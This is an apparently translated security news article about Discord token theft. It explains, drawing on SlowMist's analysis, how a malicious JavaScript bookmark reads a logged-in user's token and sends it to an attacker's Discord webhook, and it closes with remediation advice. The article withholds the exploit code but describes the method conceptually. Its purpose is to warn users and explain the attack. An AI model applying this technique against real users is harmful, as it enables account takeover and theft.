In recent years, the rapid development of blockchain technology has led to the rise of many platforms. Among them, Discord has become an important communication platform for the cryptocurrency, NFT and decentralized application (DApps) communities with its flexible settings and versatility. Attract users to track air investment information and early investment opportunities. However, opportunities and risks coexist. Some speculators use Discord to defraud and steal user funds and personal information through social engineering and phishing attacks, making Discord a platform where investment opportunities and potential risks coexist.
Today (9/4) the founder of the security team SlowMist forwarded a post , which showed that hackers attracted users to add malicious browser tags and stole the user's " Discord Token " (the Discord username and password generated when creating an account) encryption), allowing the user's account to be controlled.
As of 2024, Discord Token theft incidents continue to grow. According to the report , Discord security incidents have increased by 140% in the past year, with token theft being the main problem. In another incident worthy of attention, hackers stole private information through Gnus.AI's Discord channel and then exploited the minting vulnerability, resulting in losses of US$1.27 million .
Table of Contents
ToggleCommon Discord Token attack methods:
- Malware and Token Stealing Tools : Malware such as BlackPlague and Blitzed Grabber are specifically designed to steal Discord Tokens. Once the token is stolen, hackers can bypass password verification and directly log in to the user account to perform malicious operations.
- Server penetration : After hackers obtain the server administrator's token, they conduct extensive damage to the server, including changing settings, deleting channels, blocking members, etc.
- Webhook abuse : Attackers use Discord's Webhook function to remotely control and leak information, using these Webhooks to deliver malicious messages or steal sensitive information.
- Third-party service platform information leaked : In August 2023, the third-party service Discord.io was hacked and the personal information of about 760,000 users was leaked, further exacerbating Discord-related information security risks.
This time, we will use the concept of slow fog from the security team to explain to readers the vulnerabilities of Discord Token, and reveal how hackers use malicious bookmarks in browsers to steal users' Discord Tokens.
Phishing using browser’s malicious bookmarks to steal Discord Tokens
Rewinding time to 2022, a Discord group about the NFT project Wizard Pass in X was hacked, resulting in BAYC, Doodles, Clone X and other NFTs being stolen.
After the post came out, someone responded below
The reply stated: "Bookmark is a bookmark in a browser (such as Google Chrome). The content of the bookmark can contain JavaScript code. When the Discord user clicks on it, the malicious program will be executed on Discord and steal the token. After the hacker obtains the token , you can easily control the project's Discord account and permissions."
Slow Mist Actual Disassembly Case
To implement this function, you only need to create an a tag. Here is sample code:
When a bookmark is clicked, it can be executed like a web page background code and bypass the Content Security Policy.
Compare using Google and FireFox browsers
Readers may be wondering, why does the browser not give any reminder when a link like "javascript:()" is added to the browser's bookmark bar?
Slow Mist will compare Google Chrome and Firefox.
Take Google as an example
On the left is dragging a normal URL. When the URL is turned into a bookmark, the browser will not pop up any editing reminder.
On the right, if you drag a malicious URL, you will not be prompted either.
What about FireFox?
On the left is the normal dragging URL. The URL is the same as Google Chrome, and no editing reminder will pop up.
On the right, when dragging a malicious URL, FireFox will pop up a reminder asking the user to confirm.
This means that FireFox is more secure in terms of adding bookmarks.
Slow Mist uses Google Chrome for demonstration. It is assumed that the user has logged into the web version of Discord and added malicious bookmarks under the guidance of a phishing website.
When he clicks on the bookmark, the malicious code will be triggered, and the user's Token and other personal information will be sent to the hacker's channel through the Discord webhook set by the hacker.
Adding details of the attack that may raise questions
- Why do victims get tricked with just one click?
From the above, we can see that bookmarks can insert a piece of JavaScript code, which can do almost anything, including obtaining information through Discord's webpackChunkdiscord_app front-end code module. However, to avoid malicious behavior, the team will not provide detailed exploit code. - Why would an attacker choose to use Discord webhook to receive data? Because the format of Discord webhook is https://discord.com/api/webhooks/xxxxxx, Discord's main domain name is directly used , which can bypass issues such as the same origin policy. Readers can create a Discord webhook to test it.
- What can you do after getting the Token?
Obtaining the Token is equivalent to logging into the Discord account, which means you can do anything while logged in, such as setting up a Discord webhook bot, publishing announcements or fake news in the channel to conduct phishing attacks.
Victims are advised to take the following immediate remedial actions:
- Reset your Discord account password immediately.
- After resetting the password, log in to Discord again and refresh the token so that the token in the hacker's hands will become invalid.
- Delete and replace the original webhook link because the old webhook has been leaked.
- Improve security awareness, check suspicious bookmarks and delete malicious bookmarks that have been added.
Readers who are interested in SlowMist’s approach to blockchain phishing scams and other information security issues and want to start with technology can refer to SlowMist’s “ Blockchain Dark Forest Self-Rescue Manual .”
We must also remain vigilant and be cautious about using or adding any code or unsolicited links. There are many extensions on the Internet that look convenient and useful, but bookmarks cannot block malicious behavior, so you should be cautious every time you execute them manually to avoid being hacked.
